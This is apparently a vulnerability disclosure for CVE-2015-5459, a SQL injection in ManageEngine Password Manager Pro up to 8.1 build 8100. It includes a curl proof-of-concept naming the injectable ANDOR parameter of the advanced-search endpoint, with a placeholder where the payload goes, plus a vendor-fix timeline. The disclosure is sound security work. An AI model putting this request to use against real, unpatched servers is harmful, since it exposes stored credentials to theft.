ManageEngine Password Manager Pro <= 8.1 (build 8100) - SQL Injection vulnerability
CVE: CVE-2015-5459
CVSS v3: 9.9
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description: An authenticated user (even the guest user) is able to execute arbitrary SQL code using a forged request to the SQLAdvancedALSearchResult.cc. The SQL query is build manually and is not escaped properly in the AdvanceSearch.class of AdventNetPassTrix.jar.
The problem is with escaping the operator when more then one condition is specified in the advanced search.
PoC:
$ curl https://localhost:7272/STATE_ID/1425543888647/SQLAdvancedALSearchResult.cc?ANDOR=***HERE_INJECT***&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS&value_2=asd2&FLAG=TRUE&COUNT=2&USERID=***USERID***&ADVSEARCH=true&SUBREQUEST=XMLHTTP
Video:
Timeline:
- 30.06.2015 - vendor notified
- 15.07.2015 - vendor fixed the vulnerability in version 8.1 (build 8101)
References: I wrote an article about “zero-knowledge” secret management systems to compare different existing password managers and give guidance on how to choose a really secure password management software:
Adamczyk Błażej. Secure and convenient secret management in distributed computer systems, 2016. WSEAS TRANSACTIONS ON COMPUTERS, vol. 15, no. 2016, pp. 327-333, Full text
tags: ManageEngine Password Manager Plus CVE CVE-2015-5459